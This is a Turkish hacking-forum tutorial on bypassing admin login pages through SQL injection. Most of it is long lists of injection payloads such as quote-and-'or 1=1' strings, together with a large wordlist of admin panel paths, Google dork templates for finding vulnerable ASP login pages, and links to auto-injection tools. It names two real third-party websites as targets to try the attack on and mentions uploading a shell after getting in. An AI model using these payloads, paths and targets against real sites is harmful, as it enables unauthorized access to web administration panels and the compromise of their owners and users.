Sql Enjeksiyon Admin Authentication Login ByPass Tutorial

Sql Enjeksiyon Admin Authentication Login ByPass Geniş Resimli Videolu Anlatım

https://www.cyberizm.org/cyberizm-sql-enjeksiyon-admin-authentication-login-bypass-genis-resimli-videolu-anlatim-11517.html

Merhaba arkadaşlar ben KingSkrupellos. Forumda sevdiğim bir kardeşimin isteği üzerine yazdığım ve birçok kaynaktan alarak düzenlediğim bir dökümanı sizlerle paylaşmak istiyorum.Bu yöntemin bir diğer ismi Sql Injection Authentication Bypass’dır. Bugün size Admin Login Bypass yönteminde kullanılan admin/login.php yada SQL Injection Saldırısı veya Veritabanı saldırısı olarak ta bilinen ve halen birçok site için geçerli olan yönetim panelden SQL Saldırısı yani Login Bypass kodlarını sizlerle paylaşacağım. Genelde Windows sunucularında çalışan Microsoft web uygulamalarının (ASP, ASP.NET) veritabanlarında karşılaşılan bir saldırı çeşididir. Microsoft Access ve MsSQL veritabanı kullanan sistemlerde bu saldırı yöntemi çokça yapılmaktadır.PHP tabanlı MySQL veritabanı kullanan siteler içinde geçerlidir bu saldırı. Tabi PHP yapısı son zamanlarda özellikle CMS üzerinde yapılan yoğun çalışmalar ile SQL Injection saldırıları minimuma indirilmiştir. Ek olarak Kullanıcının şifre bilgisi MD5 olarak kriptolandığı içinde bu saldırı çeşidi PHP sitelere pek yapılmamaktadır.SQL Injection Saldırısının en basit yöntemi olan Login Bypass, Kullanıcı adı ve Şifre kısmına Bypass edici meta kodlarını yazarak panele giriş yapabilmektir. Bu saldırıyı deneme yanılma yolu ile yapabilirsiniz aşağıdaki kodları kullanarak. Yada bazen oluyor ki kullanıcının ismi admin ve şifresi ‘ or ‘1’=’1 ‘nide biz sql encekte ederek yönetici paneline girmiş oluyoruz. Tabi illa yöneticinin ismi admin olacak diye bir şey yok, ya bunu sql encekte ederek öğrenebiliriz yada site üzerinde biraz gezinti yaparak en üst düzey yöneticinin kim olduğunu da görebiliriz.

[img]http://i.hizliresim.com/o0g9vX.gif[/img]

Ayrıca konuya uygun bulduğum videolarıda sizinle paylaşıyım.
[code]http://www.youtube.com/watch?v=ap2aNpO9GJs
http://www.youtube.com/watch?v=OYpMMaSinlY
http://www.youtube.com/watch?v=TUMYNBKwOGs
http://www.youtube.com/watch?v=wDRCTy8tPUA
http://www.youtube.com/watch?v=J8FOoTcnagM
http://www.youtube.com/watch?v=16y2gvq__f0
http://www.youtube.com/watch?v=pr8h-VUDMhE
http://www.youtube.com/watch?v=QTUIqJUkXqY
http://www.youtube.com/watch?v=3R0ENxHmRdM
http://www.youtube.com/watch?v=HI7Ti9SU8es[/code]
KingSkrupellos Cyberizm.Org
ASP Siteler için SQL Injection Login Bypass
[code]
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
==
and 1=1--
and 1=1
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
1') and '1'='1--
admin' --
admin' #
admin'/*
or 1=1--
or 1=1#
or 1=1/*
) or '1'='1--
) or ('1'='1--
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
' or 0=0 --
admin
' or '1'='1
' or 1='1
1' or 1=1 -- -
' or '1'='1
' or ' 1=1
1' or 1=1 -- -
' or ' 1=1
' or '1'='1
''Or'='Or''
1'or'1'='1
' or 1=1 or ''='
" or 1=1 or ""="
' OR ''='
'' OR ''=''
'OR''='
hey' or 1=1–
''Or 1 = 1'
' or 1=1--
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
hi") or ("a"="a
'hi' or 'x'='x';
x' or 1=1 or 'x'='y
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
'or select *
admin'--
")) or (("x"))=(("x
" or ""+"
admin"or 1=1 or ""="
admin") or ("1"="1"--[/code]
ASP.NET(aspx) Siteler için Login Bypass
[code]anything' OR 'x'='x[/code]
Ve benim kendim oluşturduğum Administrator Login ByPass yöntemi kodları
Bunları yönetici panelini bulup Kullanıcı adı ve Şifreyi bu kodlarla iki kez girmektir. Daha sonra admin panelindesiniz.
[code]
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
' OR 'a' = 'a
 [/code]
Kendime ait olup geliştirdiğim Login ByPass yöntemleride var onuda veriyim
[code]'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
''Or'='Or''
1'or'1'='1
' or 1=1 or ''='
" or 1=1 or ""="
' OR ''='
'' OR ''=''
'OR''='
hey' or 1=1–
''Or 1 = 1'
' or 1=1--
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
hi") or ("a"="a
'hi' or 'x'='x';
x' or 1=1 or 'x'='y
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
'or select *
admin'--
")) or (("x"))=(("x
" or ""+"
admin"or 1=1 or ""="
admin") or ("1"="1"--[/code]
Örnek Admin Panelleri PHP,HTML,ASP VE ASPX kullanan sistemlerde
[code]
/login/web_manage.asp
/login-admin.asp
/adminlogin.asp
/admin/adminLogin.asp
/admin/login.php
/admin/login.asp
/admin/login.aspx
/admin/login.html
/admin
/yonetim
/panel
/kontrolpanel
/administrator
/giris
/login
/superadmin
/controlpanel
/yonetici
/giris.asp
/yonetim.asp
/login.asp
/yonetici.asp
/panel.asp[/code]
Not => Dorklar her zaman geliştirilebilir, illa bu dorkları kullanılacak diye bir şey yok.Dorkların önüne inurl : inalltitle : allintext : gibi yazılarla çoğaltabilirsiniz.

[code]Login Dorks: "inurl:DİYE BURAYA İSTEDİĞİMİZ YAZIYORUZ AŞAĞIDAKİLERDEN" where "DİYE BURAYA İSTEDİĞİMİZ YAZIYORUZ AŞAĞIDAKİLERDEN" = aşağıdaki listeden seçebilirsiniz.
Mesela şöyle olsun sayın cyberizm üyeleri
[code]"inurl:admin.asp"

"inurl:login/admin.asp"

"inurl:admin/login.asp"

"inurl:adminlogin.asp"

"inurl:adminhome.asp"

"inurl:admin_login.asp"

"inurl:administratorlogin.asp"

"inurl:login/administrator.asp"

"inurl:administrator_login.asp"
Diğerlerini de siz kendiniz önüne inurl : gibi yazarak çoğaltabilirsiniz.
 adm
admincp
admcp
cp
modcp
moderatorcp
adminare
admins
admin1.php
admin1.html
admin2.php
admin2.html
yonetim.php
yonetim.html
yonetici.php
yonetici.html
ccms/
ccms/login.php
ccms/index.php
maintenance/
webmaster/
adm/
configuration/
configure/
websvn/
admin/
admin/account.php
admin/account.html
admin/index.php
admin/index.html
admin/login.php
admin/login.html
admin/home.php
admin/controlpanel.html
admin/controlpanel.php
admin.php
admin.html
administrator/
administrator/index.html
administrator/index.php
administrator/login.html
administrator/login.php
administrator/account.html
administrator/account.php
administrator.php
administrator.html
login.php
login.html
modelsearch/login.php
moderator.php
moderator.html
moderator/login.php
moderator/login.html
moderator/admin.php
moderator/admin.html
moderator/
account.php
account.html
admincontrol.php
admincontrol.html
adminpanel.php
adminpanel.html
admin1.asp
admin2.asp
yonetim.asp
yonetici.asp
admin/account.asp
admin/index.asp
admin/login.asp
admin/home.asp
admin.asp
administrator/index.asp
administrator/login.asp
administrator/account.asp
administrator.asp
login.asp
modelsearch/login.asp
moderator.asp
moderator/login.asp
moderator/admin.asp
account.asp
controlpanel.asp
admincontrol.asp
adminpanel.asp
fileadmin/
fileadmin.php
fileadmin.asp
fileadmin.html
administration/
administration.php
administration.html
sysadmin.php
sysadmin.html
phpmyadmin/
myadmin/
sysadmin.asp
sysadmin/
ur-admin.asp
ur-admin.php
ur-admin.html
ur-admin/
Server.php
Server.html
Server.asp
Server/
wp-admin/
administr8.php
administr8.html
administr8/
administr8.asp
webadmin/
webadmin.php
webadmin.asp
webadmin.html
administratie/
admins/
admins.php
admins.asp
admins.html
administrivia/
Database_Administration/
WebAdmin/
useradmin/
sysadmins/
admin1/
system-administration/
administrators/
pgadmin/
directadmin/
staradmin/
ServerAdministrator/
SysAdmin/
administer/
LiveUser_Admin/
sys-admin/
typo3/
panel/
cpanel/
cPanel/
cpanel_file/
platz_login/
rcLogin/
blogindex/
formslogin/
autologin/
support_login/
meta_login/
manuallogin/
simpleLogin/
loginflat/
utility_login/
showlogin/
memlogin/
members/
login-redirect/
sub-login/
wp-login/
login1/
dir-login/
login_db/
xlogin/
smblogin/
customer_login/
UserLogin/
login-us/
acct_login/
admin_area/
bigadmin/
project-admins/
phppgadmin/
pureadmin/
sql-admin/
radmind/
openvpnadmin/
wizmysqladmin/
vadmind/
ezsqliteadmin/
hpwebjetadmin/
newsadmin/
adminpro/
Lotus_Domino_Admin/
bbadmin/
vmailadmin/
Indy_admin/
ccp14admin/
irc-macadmin/
banneradmin/
sshadmin/
phpldapadmin/
macadmin/
administratoraccounts/
admin4_account/
admin4_colon/
radmind-1/
Super-Admin/
AdminTools/
cmsadmin/
SysAdmin2/
globes_admin/
cadmins/
phpSQLiteAdmin/
navSiteAdmin/
server_admin_small/
logo_sysadmin/
server/
database_administration/
power_user/
system_administration/
ss_vms_admin_sm/
adminarea/
bb-admin/
adminLogin/
panel-administracion/
instadmin/
memberadmin/
administratorlogin/
admin/admin.php
admin_area/admin.php
admin_area/login.php
siteadmin/login.php
siteadmin/index.php
siteadmin/login.html
admin/admin.html
admin_area/index.php
bb-admin/index.php
bb-admin/login.php
bb-admin/admin.php
admin_area/login.html
admin_area/index.html
admincp/index.asp
admincp/login.asp
admincp/index.html
webadmin/index.html
webadmin/admin.html
webadmin/login.html
admin/admin_login.html
admin_login.html
panel-administracion/login.html
nsw/admin/login.php
webadmin/login.php
admin/admin_login.php
admin_login.php
admin_area/admin.html
pages/admin/admin-login.php
admin/admin-login.php
admin-login.php
bb-admin/index.html
bb-admin/login.html
bb-admin/admin.html
admin/home.html
pages/admin/admin-login.html
admin/admin-login.html
admin-login.html
admin/adminLogin.html
adminLogin.html
home.html
rcjakar/admin/login.php
adminarea/index.html
adminarea/admin.html
webadmin/index.php
webadmin/admin.php
user.html
modelsearch/login.html
adminarea/login.html
panel-administracion/index.html
panel-administracion/admin.html
modelsearch/index.html
modelsearch/admin.html
admincontrol/login.html
adm/index.html
adm.html
user.php
panel-administracion/login.php
wp-login.php
adminLogin.php
admin/adminLogin.php
home.php
adminarea/index.php
adminarea/admin.php
adminarea/login.php
panel-administracion/index.php
panel-administracion/admin.php
modelsearch/index.php
modelsearch/admin.php
admincontrol/login.php
adm/admloginuser.php
admloginuser.php
admin2/login.php
admin2/index.php
adm/index.php
adm.php
affiliate.php
adm_auth.php
memberadmin.php
administratorlogin.php
admin/admin.asp
admin_area/admin.asp
admin_area/login.asp
admin_area/index.asp
bb-admin/index.asp
bb-admin/login.asp
bb-admin/admin.asp
pages/admin/admin-login.asp
admin/admin-login.asp
admin-login.asp
user.asp
webadmin/index.asp
webadmin/admin.asp
webadmin/login.asp
admin/admin_login.asp
admin_login.asp
panel-administracion/login.asp
adminLogin.asp
admin/adminLogin.asp
home.asp
adminarea/index.asp
adminarea/admin.asp
adminarea/login.asp
panel-administracion/index.asp
panel-administracion/admin.asp
modelsearch/index.asp
modelsearch/admin.asp
admincontrol/login.asp
adm/admloginuser.asp
admloginuser.asp
admin2/login.asp
admin2/index.asp
adm/index.asp
adm.asp
affiliate.asp
adm_auth.asp
memberadmin.asp
administratorlogin.asp
siteadmin/login.asp
siteadmin/index.asp
ADMIN/
paneldecontrol/
login/
cms/
admon/
ADMON/
administrador/
ADMIN/login.php
panelc/
ADMIN/login.html
admin.
login.htm
login.
admin/login.htm
admin/home.
admin/controlpanel.htm
admin/cp.
admin/adminLogin.htm
admin/admin_login.
admin/controlpanel.
admin/admin-login.
admin-login.
admin/account.
admin/admin.
admin.htm
adminitem/
adminitem.
adminitems/
adminitems.
administrator/login.
administrator.
administration.
adminlogin.
admin_area/admin.
admin_area/login.
manager/
manager.
letmein/
letmein.
superuser/
superuser.
access/
access.
sysadm/
sysadm.
superman/
supervisor/
panel.
control/
control.
member/
member.
members.
user/
user.
cp/
uvpanel/
manage/
manage.
management/
management.
signin/
signin.
log-in/
log-in.
log_in/
log_in.
sign_in/
sign_in.
sign-in/
sign-in.
users/
users.
accounts/
accounts.
bb-admin/login.
bb-admin/admin.
administrator/account.
relogin.htm
relogin.html
check.
relogin.
blog/wp-login.
user/admin.
users/admin.
registration/
processlogin.
checklogin.
checkuser.
checkadmin.
isadmin.
authenticate.
authentication.
auth.
authuser.
authadmin.
cp.
modelsearch/login.
moderator.
controlpanel.
admincontrol.
adminpanel.
fileadmin.
sysadmin.
admin1.
admin1.htm
admin2.
yonetim.
yonetici.
ur-admin.
Server.
administr8.
webadmin.
admins.
adm.
admin_login.
panel-administracion/login.
pages/admin/admin-login.
pages/admin/
acceso.
admincp/login.
admincp/
admincontrol/
affiliate.
adm_auth.
memberadmin.
administratorlogin.
modules/admin/
administrators.
siteadmin/
siteadmin.
adminsite/
kpanel/
vorod/
vorod.
vorud/
vorud.
adminpanel/
PSUser/
secure/
webmaster.
autologin.
userlogin.
admin_area.
cmsadmin.
security/
usr/
root/
secret/
admin/login.
admin/adminLogin.
moderator/login.
moderator/admin.
0admin/
0manager/
aadmin/
cgi-bin/login
login1
login_admin/
login_admin
login_out/
login_out
login_user
loginerror/
loginok/
loginsave/
loginsuper/
loginsuper
login
logout/
logout
secrets/
super1/
super1
super_index
super_login
supermanager
superman
superuser
supervise/
supervise/Login
super[/code]
Bunun yanında güncel dorkları ve exploitleri takip edebileceğiniz iki siteyi öneriyorum.
[code]http://www.exploit-db.com/
http://www.cxsecurity.com/[/code]
İşte Size 2 site hediyem olsun. Bu sitelerde deneyebilirsiniz. Özellikle forumda sevdiğim kardeşime bir armağan olsun ve sizlere de tabiki Cyberizm.Org üyeleri.
[code]http://www.sunmarytrust.org/adminlogin.asp
http://www.preventivecardiology.in/adminlogin.asp
[/code]
Bunun yanında Fatcat Sql Injector Tool’u tavsiye ederim. Ayrıntılı bilgiyi bu link üzerinden öğrenebilirsiniz sayın arkadaşlar ve yeni olanlar, alanda zaten uzmanlaşanlar. Ben birşeye karşıyım arkadaş, herşey yeniler için değildir ve biz uzman olanlar içinde lazım oluyor bazen bu toollar yani. Neyse işte programın yada kodun ayrıntılı açıklamasını linkten öğrenebilirsiniz ama ingilizce.
[code]http://www.chmag.in/article/mar2013/fatcat-v2-auto-sql-injector[/code]
Ayrıca bu sitede İngilizce olarak resimli benim dediğime benzer resimli olarak anlatılmıştır. Takip edebilirsiniz.
[code]http://www.kanishkashowto.com/2013/08/09/website-hacking-login-bypass-using-sql-injection-2/[/code]
Sql Enjeksiyon ile Login ByPass yapılışı
[code]http://www.sechow.com/bricks/docs/login-1.html[/code]
Ayrıca güvendiğim sitelerden birisi olan bu siteden BurpSuite programıyla SQL enjekte edip login bypass olup admin paneline dalıp Shell yükleyebilirsiniz.
[code]https://www.architectingsecurity.com/2012/04/23/pentesting-of-authentication-bypass-via-sql-injection-with-burpsuite-intruder/[/code]
Bu linklerden de nasıl sql enjekte edilipde login bypass yaptığımız görelim.
[code]http://priyahackingarticles.blogspot.com.tr/2011/03/bypass-website-login-by-sql-injection.html[/code]
Not => Çok uzun oldu farkındayım ama olması gerekiyor. Neyse bu kadar anlatım yeter. Yazasıya kadar ellerim yoruldu. Hatta kollarıma ağrı girdi. Üzerine ekleme yapabilirim. Anlamayan olursa pm’le yada konu altında anlamaydığı yeri sorabilir. KingSkrupellos Cyberizm.Org.Lütfen Emeğe Saygı. Hadi görüşürüz bir sonraki makalede.